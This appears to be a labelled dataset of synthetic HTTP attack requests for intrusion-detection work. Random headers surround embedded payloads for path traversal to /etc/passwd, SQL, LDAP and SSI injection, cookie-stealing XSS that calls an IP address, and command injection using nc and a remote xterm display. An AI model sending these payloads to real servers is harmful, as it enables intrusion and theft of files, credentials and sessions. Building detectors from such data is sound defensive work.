UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0057x268
Via: 8.6 93.126.193.248
Transfer-Encoding: gzip
Upgrade: v0etkT/6.1, hornin/8.8, ekwne/4.3, cbmer7/3.7
Warning: 117 www.dpoc.html "usfeuteterl01" 
X-Forwarded-For: 53.133.215.134
X-Serial-Number: 063116688396663
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42006
Start - Id: 40742
class: SSI
GET /hPMQP/4Y7deleteexeca/HcXUyboptxx/r9OZHMGU6cTw/wexec/silbrcroemcbzdttiqx/4OF4.php3?Q11rmpihc=3843&aanEqa6do=oFl6ct&2llaxDVf=5960660&ao_HSwformMb2j=Lyerd&xeySoi6bxm6hn=oe5&Qts.havingAsock_streamca=067729019&D9rio1s=fztrenabetweenstdinE&Akezotturh2=tddsiec&dbtcs=zul&UcIwindow.openwpUB=730058 HTTP/1.0
Host: 41.254.93.223
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 11.222.96.198
Cookie: seG1se=<!-- #odbc connect="lonoy,oiuHdC,geoT"    statement="select * from     eg"-->;BAd1ZWiT=k;narai6ea=0951653
Cookie2: $Version="59"
Date: Fri, 19 Feb 10 19:05:32 UTC
ETag: "3aIPKIkua7UPA9S"
Expect: 100-continue
From: 3tcl@stomglfgs.it
If-Modified-Since: Sat, 04 Jun 05 09:02:17 GMT
If-Unmodified-Since: Mon, 16 May 05 03:35:25 UTC
If-Match: *
If-None-Match: "f5DlmR.DwJTpBxN"
If-Range: "TlFmRAixKZVJf4s_X"
Max-Forwards: 4861
Pragma: ndnEri=6jrob
Authorization: Basic SG5UOHRjZW06MGNjZ3NrdQ==
Referer: /DtN3mr/novu0ett/2ersf/aocou/atrtet.exe
User-Agent: nuaWf/6.5.1.8
UA-CPU: PowerPC
Via: 5.4 www.htwtrno.png
Transfer-Encoding: compress
X-Serial-Number: 109110782194814
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40742
Start - Id: 44929
class: PathTransversal
GET /09/Q@3kU49DG4processing-instruction0NL/yxndB/de2hTeta/b_XJ/guy5pllaoe/9selyLOwvx1iz/ItkSrh7biuonnxrnedqt.asmx?rogr=2deqeQEtelnet&ylswiu0aaeewe9A=collection%28+++++file%3A%2F%2F%2Fc%3A%2F0nyt%2Fepieoaa.xml%29&efOuinputI2Wq=qp5h&2EisANk=338570 HTTP/1.0
Host: www.ollbi6ihan.it
Connection: tMqIly
Accept: application/zip;q=0.8, application/*;q=0.6
Accept-Charset: cp-932;q=0.0
Accept-Encoding: *
Accept-Language: hlnmeA-ttiTtbI;q=0.3
Cache-Control: fe=l2ni
Client-ip: 210.224.126.37
Cookie: XM%uE3YgDW-SO=TirIev8sthee;U1OYa.t33=rrxmllike%3Eridrop3ror%26fhwevre;sttotuPl=45
Cookie2: $Version="10"
Date: Mon, 31 Mar 08 04:07:29 GMT
ETag: "FQ4mSj-450Ugdqc720s"
Expect: 100-continue
From: p2utabt@Olcttin.it
If-Modified-Since: Sat, 31 Jan 09 13:43:20 GMT
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: "uZHmAw@nZQC3NgWr"
If-Range: Mon, 26 Nov 07 05:59:30 GMT
Max-Forwards: 6672
MIME-Version: 6.2
Pragma: 3iys5e='4jtl5'
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: NTLM dGFlZWVIYmplZXJuZW9ob25lZHRlb3JoaXRydXdvQTdhdGFXMXRuaW5qYVM=
Range: -044,-5960,-6
Referer: /birdvete/hxirnn/djwvyiag/h9etr/zestl.txt
TE: chunked;q=0.4,gzip;q=0.0,gzip
Trailer: Cache-Control
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 2.3; vt-en; rv:6.5.9) Gecko/26746434
UA-CPU: StrongARM
UA-Disp: 8119,252,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: HTTP/2.3 254.213.30.94, 4.8 www.Hwcseaho.gif
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 627 www.luad.js "7atl" "Sun, 01 Jul 07 05:55:47 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44929
Start - Id: 46357
class: PathTransversal
GET /lVsXc.cN71ZWGfCZZI/rRttsooteripsnt/wethoccyih/wlaymr/rKetocZUJFa.pl?iidtarlth=%2Fetc%2Fpasswd&TnresO8trk1n=320&iSCX2Vta=672341303&Es6WOwc=581274249&q03s=euw9teetge&bON4667TA=m%3D%3B2netcatodrce+l%3C8ni&n6ootl=16&xaete5Zise=Tzotspriaqwl&SeeKe=634633&nSrsaubEozeaef=90 HTTP/1.1
Host: 182.14.130.24
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: otl='snerrau'
Client-ip: 191.28.125.93
Cookie: clnhsdjcqons1rj=in1uD5;Z-6P=inandhuhvbm)meme;mrlsevs=[:~sPjins)Ptta
Cookie2: $Version="19"
Date: Sat, 24 Apr 04 02:02:27 CET
ETag: W/"iS.lsM4a5lrac@V_Cu"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Thu, 25 Dec 08 09:58:03 UTC
If-Unmodified-Since: Sun, 10 Feb 08 14:41:51 GMT
If-Match: *
If-None-Match: "hNxmMUZYGc5pH6V"
If-Range: *
Max-Forwards: 10
MIME-Version: 1.9
Pragma: ettbtu='o'
Proxy-Authorization: NTLM bmFyZWU4dDJjVWU1dW5pY3FoZXBhMW1mOXRsRXBocnJ6c2hhbXNzc2FpbHdo
Authorization: Digest response="B5d1b5Eee005A9e34C791549c23070cD"
Range: 405245-17797
Referer: /iere/haedHa3/m5rxze.jsp
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (compatible; btbmdiar; Windows NT; hk6oh; 5ett; 8tnenpho)
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: 9.5 www.fgon.css, FTP/2.4 62.33.232.83, 7.0 www.ued1i9t.js
Transfer-Encoding: deflate
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 337 www.rrrgcit.jpeg "oqkre1aytdaE" 
X-Forwarded-For: 67.104.67.27
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46357
Start - Id: 46477
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.1
Host: www.saheayn.org
Connection: ayelsIR
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 98.141.212.240
Cookie: pncspr=:a;anmailautoexecnull3GX=asdeeaopEstmd4bu
Cookie2: $Version="355"
Date: Thu, 05 Jun 08 14:24:30 UTC
ETag: "TClpSRyVRpjXpah"
Expect: 100-continue
From: oeed@ro5sY.uk
If-Modified-Since: Fri, 21 Sep 07 01:21:45 GMT
If-Unmodified-Since: Wed, 11 Feb 04 24:10:12 GMT
If-Match: *
If-None-Match: *
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 474
Pragma: tnlL9='2xrctxds'
Proxy-Authorization: NTLM NmlrZHBhbnJlc3cwbGVBc292aWF1YXNtcmk4YWlkc2ZsZHV4YXJwM2t1bWNI
Authorization: iserFt i8zmg=rspfnme
Range: -540
Referer: http://Nfshsem.uk/nnatnttf/tseigs.doc
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/6.7 (Windows; U; Windows NT 5.8; uc-cz; rv:2.3.7) Gecko/51449181
UA-Disp: 5862,1372,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 139x000
Via: FTP/4.7 213.70.127.191:900, 0.3 www.e3ametr.css
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3
Warning: 938 www.atHFrEd.css:45 "szdtn5eo4is" "Sat, 06 Dec 08 18:20:14 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46477
Start - Id: 43621
class: OsCommanding
PUT /Xs/EK00hKpH7O3/ceGacir4.png? HTTP/1.1
Content-Length: 248
Content-Language: srczeldq
Content-Encoding: identity
Content-Location: http://D67fara.de/l8paae/nenoo.asp
Content-MD5: ZThOdHRkSGFlZGVpY2JkYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Dec 05 04:21:31 UTC
Last-Modified: Sun, 29 Mar 09 20:42:24 GMT
Host: www.ee1iavl.biz
Connection: eomh
Accept: */*
Accept-Charset: us-ascii;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 251.57.116.87
Cookie: od=snph-s h|oii+uIi;damca1t= 4oleipMe;niSdm=9cdnwod;u3sa9reEEa=48;itt=efnnt;.Zhome3O=+
Cookie2: $Version="35"
Date: Tue, 07 Nov 06 02:34:26 GMT
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: 100-continue
From: ihse@2d96a.de
If-Modified-Since: Thu, 23 Dec 04 15:18:06 CET
If-Unmodified-Since: Fri, 22 Jul 05 03:33:26 GMT
If-Match: "W54rWGr9Qs_zLL8N8"
If-None-Match: "bS64XQ@FMM274TrH"
If-Range: Mon, 24 Jul 06 18:48:07 UTC
Max-Forwards: 65
MIME-Version: 8.8
Pragma: Goea='hl0u1y'
Proxy-Authorization: Digest cnonce="eAoc0d"
Authorization: NTLM dGRrMWU4OWVQOXJhb2F0NVNkZXRoaEFwb3lzOHNxdjV1aWJvbHdlMng=
Range: -038
Referer: /iInua/vetnssas/Eea0rd/misasj.htm
TE: deflate;q=0.5
Trailer: Accept-Language
User-Agent: %0a    nc    www.ieng.com  80     ;
UA-CPU: PowerPC
UA-Disp: 2173,331,32
UA-Pixels: 6552x5468
Via: FTP/2.6 www.baze.js, oEur/5.8 www.rzAn.html:04
Transfer-Encoding: baeh; eCEI7od=voi66c
Upgrade: ztui/9.8, e5en/4.5, osoee/7.9, inhqa/2.0, 7Mlsb/6.6
Warning: 741 www.tepgi.js:26 "evtcw2ce38n8H" "Wed, 16 Mar 05 22:27:07 GMT"
X-Forwarded-For: 88.15.93.4
X-Serial-Number: 92031179386365561798
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nePe0ic0ril=libhaving)bobjectt?othmailtbn&mpiouhinoh9r=41833754&vNNrhimgAa3=ol1sly&oojLaosopT4d8i=eepakt&ZX3uJcmdh=60228849&epcg2teAuw=r&oltit7yqatssra=iceobody&ec8f=4905&oses4te=i4sc&l0ulis8ewgde=b&SfoswGlaccyaeyi=22068&h5unenb=4&eatoli=Di%u

End - Id: 43621
Start - Id: 41329
class: SqlInjection
GET /Wb7bH-EYgZ2It/lr/bbO1jQ-JihibJ2vP/hysu/hjUa/nk0AxC/I7G2WdeleteHoetcg/u0UtA_AvVxLVvIWkAc/2Z_oY/1jPSdxfvrXtI/ro3gsehrur0yea/mSPEX_79OKekKS.jpg?btglcs=lj4KJ&efMcRsdhaH=vcau50esnnt&Op-brBO%up=g HTTP/1.0
Host: www.qeRwpsLte.fr:45
Connection: keep-alive
Accept: application/rtf, audio/*
Accept-Charset: big5;q=0.3, x-mac-chinesetrad;q=0.3, x-mac-korean;q=0.0, iso-8859-9, iso-8859-5
Accept-Encoding: 
Accept-Language: gnid-than;q=0.6, d-q1;q=0.3
Cache-Control: hlbu7n='aokeh9q'
Client-ip: 208.134.75.121
Cookie: 9iw=nycG8jA45d;rshnor=ngadropcnmif-I8iframe;goya5dTR8OtmI=or   0<>(select     count(*)     from   atg4u);6igey5=5038399063;0ue=stsWlnzuesi4;nkxvOmochaZ9Y=Nulii
Cookie2: $Version="551"
Date: Thu, 03 Jun 04 15:52:29 UTC
ETag: "YRjzSo@DGQI9jnid0"
Expect: Uetlun=meteenh
If-Modified-Since: Mon, 25 Dec 06 09:33:23 GMT
If-Unmodified-Since: Tue, 24 May 05 16:09:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 345
MIME-Version: 2.7
Pragma: f=cmbn
Proxy-Authorization: staL alax=5wrhnitr
Authorization: NTLM b21hbm5hdGJpaE5yYXFodG5lZWh3aGhvMVZvaG50ZWVyc2V0aGVyeXFhb2VwaTRx
Range: -71,-00,-797
Referer: /le3eoqnj/xenG/eNueOsdH/wtn0x.jsp
TE: trailers,deflate;q=0.0,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/2.6 (compatible; igesRdtQ; Open BSD i386; nut4aom)
UA-CPU: PowerPC
UA-Disp: 1321,3529,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4725x3211
Via: 2.1 204.168.99.235
Transfer-Encoding: identity
Upgrade: wNr3h/2.0, bss/8.7, iho/9.9
Warning: 344 215.115.174.216 "8iczmraastofnar" 
X-Forwarded-For: 94.64.57.114
X-Serial-Number: 6745028
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41329
Start - Id: 41466
class: SqlInjection
PUT /thYQTeHdEfMf.js? HTTP/1.1
Content-Length: 258
Content-Language: raeel
Content-Encoding: identity
Content-Location: /7qdun/juog/indi8vlw/5slo/o0gLh.asp
Content-MD5: YWFla3RkRUphMHNpb3R4YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Sep 07 17:57:45 UTC
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: 220.120.92.228
Connection: close
Accept: video/*;q=0.7, text/html;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: A5nni5nc-pa4vbe;q=0.0, ysp-nfdi;q=0.7, hos-srtao
Cache-Control: esyaocee='8'
Client-ip: 207.142.56.123
Cookie: hev=12282;Yh0bc=3;ct9=sr9u>;LsstoLZrtosbpdr=3;rm=9bainljietaldss;aqy=i zes?eacz egijr6p
Cookie2: $Version="67"
Date: Sun, 07 Nov 04 08:55:41 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Fri, 25 Jan 08 07:47:21 UTC
If-Match: "M3AVgpaAqRcFoUfqHzc"
If-None-Match: *
If-Range: Thu, 03 Jun 04 14:16:54 UTC
Max-Forwards: 0
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM bHd1aG10VHRzQWhwb3BhZW84b3RpYXNjY2tlbGFhQ21laXNhaTZ0ZQ==
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: http://www.nkyah.be/tmttn4/Srans/Jhay2Rn/yate.doc
TE: trailers,trailers
Trailer: Range
User-Agent: ecEtst (ouMyQyFC_y; tFCi@sCd; aNKLwP; iGwDMZn; 2s9YYlW4q)
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 054x8213
Via: eorI/4.6 www.iHldvo.js, 3.6 142.35.38.157:7742, FTP/9.1 177.183.198.163
Transfer-Encoding: gzip
Upgrade: EorNU/7.3, mot/1.8
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

HnhsetqtssIn='  )/**/UNIONALL/**/SELECT/**/29/**/FROM/**/ouirhu/**/WHERE/**/( ''   =  '/**/&sensope6qxV=8&seauemry8nea=649631779&9etebaaoshtie=tscript|v+&rdarsnGisma7r2i=rurqebahetwSea&awnicGri=3&uininb7k=316

End - Id: 41466
Start - Id: 46623
class: XSS
GET /sFbH6STMJ3ZH/tbrNFI_lINbJ/oss9mo/execSa4B-yQ/noeMcyr/Y7hFDcVnlvU.aspx?veaoes=%27union&0Hooi=s&I6sperl82E=nDosnholbnph-autoexecyxml&2hfdeIn5neudeen=rhrsOsegsGKfuw&aghg154HteRra=lo+&esct=279961606&nnrt=7422&uaTleraericusl=7l3sn6aGzloitc5T4&ar=240273&psiSneceeTUmtaw=cae%3EaT&ioTste=4&gtitgAwtrT=112 HTTP/1.0
Host: 17.94.188.166
Connection: 8veeeSc
Accept: */*;q=0.3
Accept-Charset: cp-936;q=0.8
Accept-Encoding: deflate;q=0.9, identity, gzip;q=0.6, identity;q=0.8
Accept-Language: *;q=0.2
Cache-Control: min-fresh=91337
Client-ip: 160.17.79.235
Cookie: rpewe1MfnT=cHnsy s7
Cookie2: $Version="26"
Date: Sun, 22 Feb 04 16:27:07 GMT
ETag: W/"Sh4v0LOFPRUKRUrK"
Expect: 100-continue
From: ibrMts@nvsrs.biz
If-Modified-Since: Fri, 09 Apr 10 06:09:39 UTC
If-Unmodified-Since: Sun, 15 Jun 08 05:36:47 UTC
If-Match: "PT5tqgrvLe.wvGb"
If-None-Match: *
If-Range: Tue, 05 Dec 06 20:58:08 CET
Max-Forwards: 3963
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic UXREZTplY2NuaA==
Authorization: Basic c3BybDpQM1N5cg==
Range: -20,2043-844473
Referer: http://www.6hjDR.gov/couem/ieerta.js
TE: trailers
Trailer: Accept-Encoding
User-Agent: <!-- -- --><script >[window.open('http://207.196.70.219/mame.exe'+document.cookie);]</script  ><!-- -- -->
UA-CPU: 68000
UA-Disp: 905,409,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 950x529
Via: 7.9 96.49.87.39:74
Transfer-Encoding: gzip
Upgrade: sid9/2.5, yer/8.1, dWttre/6.2, Ehs0tt/1.4
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 151.204.29.132
X-Serial-Number: 205630072672
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46623
Start - Id: 38089
class: LdapInjection
GET /fUJKNWzXFRlPC2AaDo/sh/Irscjy6hrRPtIvB/aTtjfyYdote/rp1/SZdAwxtermaJmochamZ@Q/awq_diuueOnXpY1/HKYoYj.ZdU/x-le-B/u@5kMSa_N4tgq/a6eoaitH1ie7s8f9eo4a.tiff?PzNBUmN6sNC=%3Fls4lon+ht+t&drwq80bo=98&bgdnaeCr=ornIt3i+%3E&eth9gbyL8=lluNU7byyorateo&osu1=bCw7atea0r&htawoewbr3e8=6577001&h5XLconnectyp=bxrodm4z5m1strAisu&pEOstujE=1ea%7Elebqleo+&m7ad14otl=855376&3ytaesxh=41817&hSat=m4iy%29%28%26%28objectClass++%3D+aa*%29&aao=cbpe_kw&ooroauhno8L9lt=n-l HTTP/1.1
Host: 204.198.79.147
Connection: close
Accept: */*
Accept-Charset: us-ascii, iso-8859-5, windows-1258;q=0.7
Accept-Encoding: gzip, deflate, identity, identity;q=0.9
Accept-Language: e-ab6;q=0.8, nadc-tew;q=0.2, uta-a4r
Cache-Control: no-cache
Client-ip: 209.94.206.107
Cookie: vHuabrUdnsE=02854068;t5n=25;o1amlwrMnr=e;zay07zzrlMt=7448624;aZqSCrr6itql=iRlKa
Cookie2: $Version="74"
Date: Sat, 03 Mar 07 05:19:08 GMT
ETag: W/"WFlRn2_F0qiz2qXuNMV"
Expect: 100-continue
From: oaitn@wnslnp.com
If-Modified-Since: Thu, 24 Feb 05 12:37:03 CET
If-Unmodified-Since: Sat, 05 Jun 04 20:20:03 UTC
If-Match: *
If-None-Match: "NtTBkiQr7.qr_qJGPp"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.3
Pragma: 2eiNanEg=sena7dln
Proxy-Authorization: Basic VDQ5QTpieGVt
Authorization: cesl ryuI1r1=sdsinmen
Range: 77-,76-
Referer: /hoaed/Oaonejo/1cta3t.swf
TE: deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/7.9 (X11; U; Open BSD i586 1.7; sm-ed; rv:4.5.5) Gecko/85331040
UA-CPU: 68000
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 1.0 81.223.53.197, HTTP/5.2 www.IeeEe.jpg, HTTP/6.6 98.168.5.53
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 219 www.3ozcshh.html "dmg8ee" "Tue, 02 Sep 08 10:15:09 GMT"
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38089
Start - Id: 42359
class: SqlInjection
GET /fe1rny/87/9w8MqD1/r6ilttishE4vr5e4tt/qgcdVYqejtwkzNRT/nol.shtml?moeg1esNury=AND++++ascii%28lower%28substring%28%28SELECT++TOP+1+++kplhail++++FROM++sysobject++WHERE+xtype++%3D+%27U%27+++%29%2C1%2C1%29%29%29+++%3E+++111&et=udshmbpassthru%29gt&7lib4VnoGAbw=9AnemtgdimlazmaTit&Zd69SHq=omidandh+hEzget5tt&sonri1ckoe=2622&UCkoQcwMKYB=xhlAmstdin%7Ekhtcl&fsx@_include=8012608&ees3ers1aar=odiNcgroup+byzFr HTTP/1.0
Host: www.tfreNfF7.cz
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: c-Dit, Lsicbiqi-enmurcor, hnceqae-hnttt4;q=0.2, iuo-7
Cache-Control: max-stale
Client-ip: 34.178.32.79
Cookie: dtyaesar=hmecgsedocument;cIo=mail-yA:s'roSer:wsh]rcpe6;aEitcdenst=oWqPJB;paYihtkas=e;h8-L=re;es4hnftz1G=588
Cookie2: $Version="89"
Date: Mon, 10 Dec 07 24:54:45 UTC
ETag: W/"Y5IldwmwdkaFy1R"
Expect: 100-continue
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Sat, 02 Aug 08 03:17:45 GMT
If-Unmodified-Since: Wed, 24 Aug 05 02:43:40 UTC
If-Match: "wk6-mORo9SeNl-IKMyq"
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Wed, 21 Feb 07 16:25:05 CET
Max-Forwards: 62
MIME-Version: 7.5
Pragma: yjtgmX='w'
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: NTLM ZWRwZWhhc2Fhbm51aXdxRWVvZWloZXRhZUpxYWVlbnJl
Range: -966,396-333,-3990
Referer: /celrwL/vineh2d/kss8sarE/STushet.tar.gz
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.4 (compatible; Konqueror/2.9; WinNT; wmmdthrfdn)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 180x738
Via: 8.0 81.173.148.50:45, 9.5 www.eroseso.jpg
Transfer-Encoding: ut3jv; ts4cTu=6leduad
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42359
Start - Id: 45703
class: PathTransversal
GET /mB@J1FavqVktqk/euaiIl1AfsiHrwa.sh?olnan2=tegrr&lig=54928095&sitpUoofieX=o%3A%5Cwindows%5Cboot.ini&so0yir6iaete=q++a+e%24e%2BgtscriptEn&arml=svswinntfo&eec4hl7oa3=9cgtlelmS+&wo1cs=%5Baa%40l&DiipOt6in2nw=%3Ahde%3Dero%29bh%27zao5oI%24+&Nwmo8t3tntzpnp=61932851&QzJ0kiWVFY=er1ra&7hi2staOhiA=8918613&nwsEh43bchsel=2gnotyoyyettraeeo2&eja9hit=oneerrxerI HTTP/1.1
Host: www.hdoraiB3e.ch
Connection: keep-alive
Accept: audio/*, text/plain;q=0.3, video/*;q=0.2
Accept-Charset: x-mac-chinesesimp;q=0.1, shift_jis;q=0.2, x-mac-chinesetrad;q=0.1, iso-8859-2;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: ybeat6=shisd
Client-ip: 8.138.141.106
Cookie: tecmsxa= nengc'Sa;sseR=3-2xJE;TOHJ2fs3E=Aexec;servicesBOZ20p3qkZ1=6494752474;dlnbS=450584
Cookie2: $Version="32"
Date: Fri, 20 Mar 09 16:19:43 UTC
ETag: "2j2pLmGkE8-lE0K5GK"
Expect: natos=yxma8O;hfnxts
From: eajtut@smge.gov
If-Modified-Since: Sun, 13 Nov 05 11:19:08 UTC
If-Unmodified-Since: Mon, 17 Apr 06 14:47:18 GMT
If-Match: "-fiQB7xbz_BH9HJ46"
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: *
Max-Forwards: 71
MIME-Version: 5.2
Pragma: as='en7p'
Proxy-Authorization: Digest realm
Authorization: Basic ZXJzemU6NGVlZDBl
Range: -934,-807,-703421
Referer: http://www.lnShAnta.cz/to4Leoil/so5bidsl/owtaer/sd8jefr.swf
TE: chunked;q=0.9,trailers
Trailer: Cache-Control
User-Agent: cadbk (ppZe46DsN; d.ieaz; oSKtrr; eIfUZxCX)
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6938x271
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: irhshf
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45703
Start - Id: 40040
class: SSI
GET /tpwt/ebevsteAaeu/lgnrtte/h70Yt.jsp?reetso=+%3Bnnaeaipwget%7Ce&sntirt4=trm1r3ldii&nhce7alai08ee=%3C%21++%23%3C%21--+++++%23exec+++cmd%3D%22id%22--%3E&ftl=%3B%29ts HTTP/1.0
Host: 49.252.111.191
Connection: close
Accept: video/mpeg, audio/basic
Accept-Charset: euc-jp;q=0.6, utf-8, x-mac-korean, iso-8859-7;q=0.5, windows-1257;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 160.214.20.200
Cookie: nnootrdztsbynMM=8416739662;fnE_sK_Qpe=tS]nigietttl
Cookie2: $Version="25"
Date: Tue, 15 May 07 15:15:32 GMT
ETag: "1oi95JajISSvSc6NmwV"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Sun, 11 Sep 05 17:46:44 CET
If-Unmodified-Since: Thu, 25 Oct 07 19:23:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 402
MIME-Version: 7.2
Pragma: botele3y='v'
Proxy-Authorization: Digest username="tsbedo"
Authorization: Digest realm
Range: 04250-19296
Referer: http://3eri.org/h52A/Ilwe/uteTsuh/erheeiZO/omfRp4.mdb
TE: trailers
Trailer: If-Range
User-Agent: escosmjh (stDgaDrqUz; pOuiytBb)
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 3.0 www.aUne.jpeg:1310
Transfer-Encoding: oretoe
Upgrade: sonW0n/7.4, iecird/0.5, sihan/2.9
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40040
Start - Id: 36692
class: OsCommanding
POST /ieerled4udbijnytleo/hL2F.php3? HTTP/1.1
Content-Length: 101
Content-Language: e5,ebdiluz
Content-Encoding: gzip
Content-Location: http://3t73ua3.de/v5eiHTfn.shtml
Content-MD5: bnRtbmNzNkVxZU5jaTRueA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Nov 06 03:20:48 GMT
Last-Modified: Thu, 07 Feb 08 17:55:08 UTC
Host: www.inesyfett.net
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: utf-8, iso-8859-7;q=0.6, windows-1255;q=0.4, x-mac-turkish;q=0.9
Accept-Encoding: 
Accept-Language: *
Client-ip: 131.23.123.221
Date: Sat, 10 Mar 07 22:42:18 CET
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Fri, 24 Mar 06 04:52:52 UTC
Max-Forwards: 36
Authorization: Basic TXpsbmNhYTp0dGFvNGNn
Referer: /tssoeuzr/yzZ8e/6ihgs/aeAeann.doc
User-Agent: Mozilla/5.4 (X11; U; Open BSD i386 3.1; sy-ud; rv:2.8.2) Gecko/02309405
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 3045x1540
Via: 8.7 197.197.131.184
Transfer-Encoding: identity
----: -------------------------

nash6reeew=65775&yqiiLtlxooc=%0Axterm     -display  www.inlaanin.com:0.0 &ninnn=o3iq2wotpmojyt1ii

End - Id: 36692
Start - Id: 48397
class: XPathInjection
